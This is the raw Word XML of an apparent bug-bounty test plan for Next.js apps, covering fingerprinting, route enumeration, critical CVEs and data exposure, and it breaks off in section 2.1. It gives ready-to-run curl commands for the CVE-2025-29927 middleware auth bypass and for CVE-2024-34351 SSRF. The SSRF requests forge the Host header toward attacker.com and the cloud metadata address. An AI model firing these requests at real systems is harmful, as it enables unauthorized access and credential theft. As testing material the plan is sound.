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2C2C2A"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">Next.js Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56DB"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">Bug Bounty Test Plan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1800" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive Vulnerability Testing Guide — 2025 Edition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Covers: Next.js 13 / 14 / 15 · App Router · Pages Router · Edge Runtime · SSR / SSG / ISR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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How to Use This Document</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This test plan is structured into sequential phases. Work through them in order — early recon determines which later tests apply. Each vulnerability entry includes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">What it is — a plain-English description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Why it is an issue — the security impact and real-world consequence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How to test — exact curl commands, payloads, and grep patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">What to look for — indicators of a successful finding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation — how the developer should fix it (for your report)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56DB" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability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2400"/>
        <w:gridCol w:w="3000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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CVSS / Impact</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01</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CVE-2025-29927 Middleware Auth Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FCE8E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C2C2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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CVSS 9.1 — Full auth bypass</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02</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__NEXT_DATA__ Sensitive Data Exposure</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PII / secrets in HTML source</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03</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NEXT_PUBLIC_ Secret Leakage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FCE8E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C2C2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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API keys in browser bundle</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04</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API Route Missing Auth</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Unauthorized data access / IDOR</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05</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Middleware Matcher Gaps</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Protected routes accessible</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06</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_next/image SSRF</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Internal network access</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07</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CVE-2024-34351 Host Header SSRF</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SSRF via forged Host header</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08</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Source Map Exposure</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Full server-side code disclosure</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09</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Open Redirect via callbackUrl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Phishing / credential theft</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10</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CORS Misconfiguration</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Cross-origin data exfiltration</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11</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Catch-all Route Path Confusion</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Auth bypass via path tricks</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12</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.env File Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FCE8E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C2C2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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All secrets exposed</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13</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Server Actions Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Hidden logic callable externally</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14</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ISR Cache Poisoning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Stored XSS / content injection</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15</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Prototype Pollution via Query</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Server-side logic corruption</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16</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Missing Security Headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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XSS / clickjacking / MITM</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17</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JWT Verified Only in Middleware</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Token forgery on API routes</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18</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Rewrite/Redirect Rule Bypass</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Blocked paths accessible</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19</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Debug / Error Info Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Stack traces, file paths leaked</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20</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Outdated Next.js Version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2C2C2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">VARIES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Multiple known CVEs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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0 — Reconnaissance &amp; Fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Before running any active tests, confirm the target is running Next.js, determine the version, and identify the rendering mode. This shapes every subsequent test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">0.1 Confirm Next.js is in Use</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Next.js leaves several fingerprints in HTTP responses and HTML source. Confirming the framework and version is the first step.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56DB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">What to look for</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HTTP headers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X-Powered-By: Next.js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HTML source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&lt;script id="__NEXT_DATA__" type="application/json"&gt;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JS bundle paths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/_next/static/chunks/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/_next/static/css/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Internal Next.js routes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/__nextjs_original-stack-frames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/_next/webpack-hmr     (dev mode — note it: likely dev creds, verbose errors)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56DB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Commands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 | grep -i "x-powered-by\|next"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 | grep -o "__NEXT_DATA__\|_next/static" | head -5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">0.2 Detect Version</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The exact Next.js version determines which CVEs apply. Version data leaks in multiple places.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="12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Critical CVEs like CVE-2025-29927 only affect specific version ranges. Identifying the version immediately tells you which critical checks are likely to succeed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56DB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Commands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Method 1: grep build manifest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https://target.com/_next/static/chunks/webpack-*.js 2&gt;/dev/null | grep -o '"next":"[^"]*"' | head -3</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Method 2: build ID endpoint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https://target.com/_next/static/BUILD_ID</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Method 3: routes manifest (often publicly accessible)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https://target.com/_next/routes-manifest.json | python3 -m json.tool</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Method 4: npm package from exposed files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https://target.com/package.json 2&gt;/dev/null | python3 -m json.tool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">0.3 Identify Rendering Mode</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Next.js supports SSR, SSG, ISR, and the App Router (Next.js 13+). Each has different attack surfaces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56DB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">How to detect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SSR — __NEXT_DATA__ has serverSideProps and changes on each load</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https://target.com/page | python3 -c "import sys,json,re; d=sys.stdin.read(); m=re.search(r'__NEXT_DATA__.*?&gt;(.*?)&lt;/script&gt;',d,re.S); print(json.loads(m.group(1))['props'].keys()) if m else print('no __NEXT_DATA__')"</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App Router (Next.js 13+) — look for these in bundle paths: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 | grep -o "/_next/static/chunks/app/[^"]*"</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ISR — check cache headers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https://target.com/some-page | grep -i "cache-control\|x-nextjs-cache\|age"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ISR response: Cache-Control: s-maxage=60, stale-while-revalidate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">0.4 Route Enumeration</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Map every accessible route before targeted testing. Includes pages, API routes, dynamic segments, and catch-all routes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56DB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Commands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Pull route list from JS bundle (App Router exposes this)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https://target.com/_next/static/$(curl -s https://target.com/_next/static/BUILD_ID)/_buildManifest.js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Brute-force API routes with ffuf</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ffuf -w /path/to/api-wordlist.txt -u https://target.com/api/FUZZ -mc 200,201,301,302,400,401,403,405 -o api-routes.json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Recursively spider the site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gospider -s https://target.com -d 3 --json | jq .output | grep "api\|internal\|admin"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Extract all linked JS files and pull route strings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 | grep -oP "/_next/static/chunks/[^"]*\.js" | while read f; do</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curl -s "https://target.com$f" | grep -oP "/api/[a-zA-Z0-9/_-]+"</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done | sort -u</w:t>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1 — Critical CVEs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 CVE-2025-29927 — Middleware Authentication Bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="C0392B" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERITY: CRITICAL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Next.js uses an internal header x-middleware-subrequest to track recursive middleware invocations and prevent infinite loops. In versions before 15.2.3 and 14.2.25, an attacker can send this header externally to make Next.js skip middleware execution entirely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="12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Middleware is the primary — and often only — layer enforcing authentication, authorization, redirects, and rate limiting in many Next.js applications. Bypassing it gives an unauthenticated attacker direct access to every protected route: admin panels, user dashboards, internal API routes, and restricted content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56DB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected versions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Next.js &lt; 14.2.25  (Pages Router + App Router)</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Next.js &gt;= 15.0.0 and &lt; 15.2.3  (App Router)</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Self-hosted only — Vercel platform patched separately</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Basic bypass — try on every auth-protected route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-o /dev/null -w "%{http_code}"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"x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware"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https://target.com/admin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Also try these header value variants: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x-middleware-subrequest: pages/middleware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x-middleware-subrequest: src/middleware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x-middleware-subrequest: middleware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Automated scan — test all discovered protected routes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while read route; do</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code=$(curl -s -o /dev/null -w "%{http_code}"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"x-middleware-subrequest: middleware:middleware:middleware"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"https://target.com$route")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echo "$code $route"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done &lt; protected-routes.txt | grep -v "^302\|^301\|^303"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56DB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">What to look for</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A 200 or 304 response on routes that previously returned 302/401 confirms the bypass. Also check if the response body contains authenticated content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56DB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade to Next.js 14.2.25+ or 15.2.3+. Additionally, strip the x-middleware-subrequest header at the reverse proxy/CDN layer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 CVE-2024-34351 — SSRF via Host Header in Server Actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="D68910" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERITY: HIGH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Next.js 14.x before 14.1.1 used the HTTP Host header to construct the URL for Server Action redirect responses without validating it. An attacker can forge the Host header to redirect the server's fetch to an attacker-controlled or internal destination.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="12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This is a server-side request forgery (SSRF) vulnerability. It can be used to access AWS EC2 metadata endpoints, internal services not exposed to the internet, and cloud provider metadata APIs to steal IAM credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56DB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected versions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Next.js 14.0.0 through 14.1.0</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Must have at least one Server Action defined</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1: Find a page with a Server Action (look in HTML for Next-Action header support)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 | grep -i "next-action\|data-action"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2: Invoke the action with a forged Host header</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-X POST https://target.com/page-with-action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"Host: attacker.com"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"Next-Action: [action-id-from-source]"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"Content-Type: application/x-www-form-urlencoded"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-d "" -v 2&gt;&amp;1 | grep -i "location\|redirect\|host"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3: Test for internal metadata access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-X POST https://target.com/page-with-action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"Host: 169.254.169.254"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"Next-Action: [action-id]"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-v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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2 — Data Exposure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 __NEXT_DATA__ Sensitive Data Leakage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="D68910" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERITY: HIGH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Everything returned from getServerSideProps or getStaticProps is serialized into a JSON blob inside a &lt;script id="__NEXT_DATA__"&gt; tag in the HTML. This is visible to any unauthenticated user who views source — including search engine crawlers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="12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Developers frequently include data in getServerSideProps intended only for the component — but forget it is also embedded in the HTML. Findings include: session tokens, internal API keys, PII (full user objects), internal URLs, database IDs, admin flags, feature flags with security implications.</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Extract and pretty-print __NEXT_DATA__ from any page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https://target.com/TARGET-PAGE |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grep -oP '(?&lt;=&lt;script id="__NEXT_DATA__" type="application/json"&gt;).*?(?=&lt;/script&gt;)' |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python3 -m json.tool</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Bulk extract from all pages (after spidering)</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while read url; do</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echo "=== $url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curl -s "$url" | grep -oP '(?&lt;="pageProps":)\{[^}]*\}' | python3 -m json.tool 2&gt;/dev/null</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done &lt; all-pages.txt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Look for sensitive keys in the output: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 | python3 -c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import sys, re, json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m = re.search(r'__NEXT_DATA__.*?&gt;(.*?)&lt;/script&gt;', sys.stdin.read(), re.S)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if m:</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d = json.loads(m.group(1))</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text = json.dumps(d)</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for kw in ["token","secret","key","password","auth","credential","private","email","phone","ssn"]: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if kw in text.lower(): print(f"FOUND keyword: {kw}")</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56DB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">What to look for</w:t>
      </w:r>
    </w:p>
